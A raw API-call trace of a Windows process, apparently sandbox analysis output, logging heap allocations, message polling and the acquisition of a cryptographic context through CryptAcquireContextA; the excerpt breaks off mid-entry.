[0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0188.577] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0188.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0188.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0188.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0188.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0188.577] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0188.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.577] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0188.578] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0188.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0188.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0188.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0188.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0188.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0188.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0188.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0188.578] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0188.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0188.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0188.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0188.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0188.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0188.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0188.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0188.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.580] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.580] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0188.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0188.582] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0188.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0188.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0188.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0188.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0188.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0188.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0188.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0188.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0188.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0188.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0188.583] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0188.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0188.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0188.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0188.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0188.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0188.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0188.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0188.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0188.584] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0188.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0188.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0188.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0188.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0188.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0188.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0188.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0188.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0188.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0188.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0188.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0188.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0188.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0188.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0188.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0188.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0188.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0188.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0188.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0188.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0188.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0188.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0188.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0188.587] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0188.587] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.587] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.588] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.588] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.588] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0188.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0188.588] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 